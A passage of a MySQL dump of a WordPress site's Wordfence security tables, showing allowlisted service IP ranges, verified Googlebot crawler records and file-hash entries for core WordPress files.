:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]}}','yes'),('wp_home_url','https://companyregistration.online','yes'),('wp_site_url','https://companyregistration.online','yes'),('lastDailyCron','1567012420','yes'),('lastPermissionsTemplateCheck','1567056460','yes');
/*!40000 ALTER TABLE `wpxb_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfcrawlers`
--

DROP TABLE IF EXISTS `wpxb_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfcrawlers`
--

LOCK TABLES `wpxb_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wpxb_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wpxb_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1566505364,'crawl-66-249-79-240.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1566420715,'crawl-66-249-79-247.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1566977292,'crawl-66-249-79-243.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1567010262,'crawl-66-249-79-244.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1566973778,'crawl-66-249-79-245.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1566979927,'crawl-66-249-79-241.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BO','>b0oQ1','verified',1566957041,'crawl-66-249-79-242.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@u','>b0oQ1','verified',1566801576,'crawl-66-249-64-117.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@z','>b0oQ1','verified',1566800552,'crawl-66-249-64-122.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@q','>b0oQ1','verified',1566781945,'crawl-66-249-64-113.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@t','>b0oQ1','verified',1566683518,'crawl-66-249-64-116.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@w','>b0oQ1','verified',1566703735,'crawl-66-249-64-119.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@x','>b0oQ1','verified',1566703739,'crawl-66-249-64-120.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@r','>b0oQ1','verified',1566703836,'crawl-66-249-64-114.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@s','>b0oQ1','verified',1566709840,'crawl-66-249-64-115.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0B@v','>b0oQ1','verified',1566709845,'crawl-66-249-64-118.googlebot.com');
/*!40000 ALTER TABLE `wpxb_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wffilechanges`
--

DROP TABLE IF EXISTS `wpxb_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wffilechanges`
--

LOCK TABLES `wpxb_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wpxb_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wffilemods`
--

DROP TABLE IF EXISTS `wpxb_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wffilemods`
--

LOCK TABLES `wpxb_wffilemods` WRITE;
/*!40000 ALTER TABLE `wpxb_wffilemods` DISABLE KEYS */;
INSERT INTO `wpxb_wffilemods` VALUES ('\0+OW+','index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*_Q:V[CI\0','׀]Ho&Y\0Yɱ	\Z=K','',0,'?'),('[/9}`:wP','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@/9rR','CYR)Kj\\\0qJ>8Ef','',0,'?'),('a?_ˢ6jX','readme.html',0,'4d4X','4d4X','\nޏ%]$S,S8AYzF%E\\','',0,'?'),('Kgo#0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\_]ޫ$','΢2μPυd,zb)w;u','',0,'?'),('-)75y8cWv','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l(3c܄\"_','SE	B\ruLYEԱ72Մ','',0,'?'),('XH奥(:Z','wp-admin/admin-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ORRi1xT','8,+#Edho(8De޽w%E\0\Z','',0,'?'),('!1b݅9*\\','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i(#\rD$\r%5','De3|iIOLvxa','',0,'?'),('KUg0MU/ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OQx$\nIO','?!mWd<2|7SE3s\"','',0,'?'),('@mOW','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٚf\ZN@yaŵ','L׌<X6MAM*ĽW+Ę幐aY','',0,'?'),(']@\n>ĺYn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' a^','ґ)W͏`+j8H,]U\ZDeXc<,%','',0,'?'),(',H(b_FO','wp-admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ΔNX3E\r','RP.~LmK<1ir\\$aG','',0,'?'),('	Xt\\4vNI5j','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BEtv2fIgy]!','%\0zP0&@KA-q!,ꍙ','',0,'?'),('\"6\r+K{\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p [.&:ԃ','.Mt-:/k@񛣦7dEr','',0,'?'),('kM̙Ysp','wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZcG(K','߁:+|V	~*\ra@;}Kl','',0,'?'),('*O-Lτ\r[u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n]%KטW&[%','ՆPTAx:Vጀ}s>j|ǅ','',0,'?'),('Unɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06\rq,sdV','(O@z4Ao@ٸҏ^V1G9r','',0,'?'),('A7\'C#wSs','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wI۪w|Z1;','c*9+[uՀJ/','',0,'?'),('J!2\0','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3W!R','=tw;Vu^sjP+[;','',0,'?'),('mn9F6','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e [׹F\"m.','-)wZ3)azmxhN~Юƅ%u:','',0,'?'),('T]\\g4źuP;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-QvC','	fCƜ$d}\\,xOR:Wܥ9;7j','',0,'?'),('\"Z0\0ؿeԦp','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZXkc\0Lg','zV\"ET\n@K֗Bo-','',0,'?'),('E58yWsO','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oY','m@E^8!զ@NBF','',0,'?'),('`\n2','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\0/R','LWTֳ	{izLM\0','',0,'?'),('=f;Vdl\"','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')?sEH','yq}l[=	n(cLC','',0,'?'),('LߨϤ(R','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CAO^)','/y14~(6>B&F,S','',0,'?'),('~}{ >D}<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O+jwh3:N','}c/ٖ)DeKxOdH|5p[[n','',0,'?'),('Pa`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_`\ZpC','F`q$`gu\0 TZ\Zw','',0,'?'),('rW3᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d(;^','\"T*M$!]:ŭ<=Z&\0\'','',0,'?'),('F?C;$H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZ-ŎE\n','F4N}5Q\"M:nʤGc$','',0,'?'),('ܡ9u_\\\n9\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nZ\'\0C','.P)P&_ipOu\n%\Z$j\n3)R\rY','',0,'?'),('J|6}P,\rٛ','wp-admin/css/colors/_admin.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','slIˁ߈D','?^9ϳ$Iɯ','',0,'?'),('ue,\"\n	hg.','wp-admin/css/colors/_mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iƢTȶ(','U9ælW?9Tc䫁:h(','',0,'?'),('=CѠ*TX4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qWס@7zz>ό','xn1ج8H-i+z*&̃{','',0,'?'),('58d`S61K>ۮv','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w~_:M','﹀	@4:W+$w_Lu','',0,'?'),('D8hFޛBViR','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0V[A֢y&+?$','ߛ;\rT4]ѼJȨsc','',0,'?'),('FZYC83E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PUSnM	u*','EDYr˭q&뷢E\0{A}','',0,'?'),('tm6ۗq.=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\n\n_3','G²1\'MUBKW{-qtaA','',0,'?'),('L>tN','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5Iהg,)ZYM','\\kS뚑n wW	!*~v','',0,'?'),('juGCtO','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','];6Th','	A]7:(npCcs\0hLIn','',0,'?'),('q?%rp07q','wp-admin/css/colors/coffee/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y-`^b3k9Xԗ[9','wg~t\0t\'eXolmxg','',0,'?'),('ϴ 3P`#8^Z','wp-admin/css/colors/coffee/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`&֣?u','nfhxX ߕΠ,9R3M\'+\n.I','',0,'?'),('eCDi!','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Zo6vrt8,>','\"V`+ʰB6oʵ7(','',0,'?'),('xIH.9YBO','wp-admin/css/colors/coffee/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9~8 z#C0^%a','\0{Zr~d0|B|]ׄj܌Ix>','',0,'?'),('jmEAXuw>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@cJ܁','EO7S5;YX&nۉ,Ԅ','',0,'?'),('Dչ$Oa','wp-admin/css/colors/ectoplasm/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kׇ8^]bG','7Xh\\=^q(C~','',0,'?'),('H\0ۙhC','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d$\nm:','7yLzS\"2&8w|!R','',0,'?'),('[#ܧ\Z>]<','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x6^l\r$qՈk','T\\ǫ9s j4h#:\rLA','',0,'?'),('MTq&[?>칊\n','wp-admin/css/colors/ectoplasm/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q9+\"+','BmNhstNjAS4X\0$','',0,'?'),('q%ű m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ʵ\Zp]W','j_Wp*+h<hSyY','',0,'?'),('-f4]#\"ul','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_vǜ`~','b;\'d2Jgq#aNF02','',0,'?'),('v{#lb\0}B','wp-admin/css/colors/light/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$x$','nl\Z;JF|^L|','',0,'?'),('9(FRj2n6]','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lI$2 ӹ','ѫV\0M<\r\nqwx%粈1\"|:','',0,'?'),('KS+e׎A@','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HG#<^o','?=ҏE\ZMaXĺJ\"sk;3','',0,'?'),('L?@.~O','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`?6e-','3TS\\u+uW!S\n\'','',0,'?'),('ᗏ3-4','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',`᎑*V','χmzBJc/`\\ yc','',0,'?'),(';bfȖ0x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IĬ[*#L','$TzVSɥu%yV','',0,'?'),('_\rJL#@B','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?c6=#$\njetA','耒bEiz707Ւ\'*5j','',0,'?'),('w=ŢO&F','wp-admin/css/colors/midnight/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&܍|DW!E4','SoGp{\"FuS&','',0,'?'),('<(*A]O','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fOyU_f',' ;v4;\\iN','',0,'?'),('{^WC','wp-admin/css/colors/ocean/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' EجVG##@','Sd_p˦F=ǳ\'G^.4\r-','',0,'?'),('Ê5ff;,G!\'\'-','wp-admin/css/colors/ocean/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\X4P','ÜHd]2IYhW WLu','',0,'?'),('*Tu\r~m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Gt撷Lm','HY^vkA5UUIl@.Gs','',0,'?'),('-Ǹ%w=','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z|[l|ٱf%h','ɮ1uZRH6I\r	ź􇖈B','',0,'?'),('j׻q.*;2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')/ҟqjvRR','9]<֬Xi$eT_mр˚','',0,'?'),('2jL,W\rW$','wp-admin/css/colors/sunrise/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#ķˤR?','al4gq3|U&ebPQ\"','',0,'?'),('y85æb','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','솠Fج<Qq:','BЂþYws;9Þ_m`+d8','',0,'?'),('-+emu\"x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_tP/W9','\\?ˡ1t.M<ANalQzYbd','',0,'?'),('SCRCl','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Zz	h=','Q_n97L2$y:jSх','',0,'?'),('W2DG7V','wp-admin/css/common-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')NEq@',':T߶_ԜVQI','',0,'?'),('XHov','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vXۆyl','dD:EncOʧAVM,qOԩ','',0,'?'),('p96èR','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԩ4aFзd','Ԩ )((_[P4SKopڳ','',0,'?'),('\rvN[B&SL','wp-admin/css/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@Lm\n{S`cg`','\n.o+gGYce|om','',0,'?'),('Vk9۴sֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!F>%υ--U#','Rd[\0vM{BY2qC\0s+(o','',0,'?'),('pj֛`w','wp-admin/css/customize-controls-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z[^,','d+T܃2^E\rP	tn$q','',0,'?'),('?\n5H?','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tZ\ZWi`u','K	I@ØeCF&tF','',0,'?'),('.նZg{=','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\'i','R?#b,/k66~.O:c+','',0,'?'),('Oy k	b','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3vwfb0ED','](@Q.W\"/ϊn˱(','',0,'?'),('HAf,$F-','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!_A@@+1`gJ','cG.-,Fɯժ2O8<m!','',0,'?'),('AlA~i^uØ','wp-admin/css/customize-nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*4^+G(ߢ','o\'晱}z\n','',0,'?'),('\0]pޑ	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PG(h@','a`kt%j+Qm\nhƪWh~','',0,'?'),('NHV}4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7;~juS;HHK','sA,GvR~hRnh','',0,'?'),('4T(\\9\'3)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M<Q&1','\'tNt?텚ʆ~S','',0,'?'),('6$[O','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?r<zK','B\\T3S,C9,ш	.]`O','',0,'?'),('b|e~','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v.E;$<V.','܊b껗4^M\Z9eoAzO','',0,'?'),('5?y<2','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l5	Ka','8C#V\\O|mvK\r','',0,'?'),('Ms;\',-E','wp-admin/css/dashboard-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u0<l	0','bx{<:+=/sw }Q','',0,'?'),('KqM{','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[XKf\\K','=(@jxw:\0V/Xpa&','',0,'?'),('+.eF','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','שz#Л*fK','zk\rm胯*tD\'en(t˿d 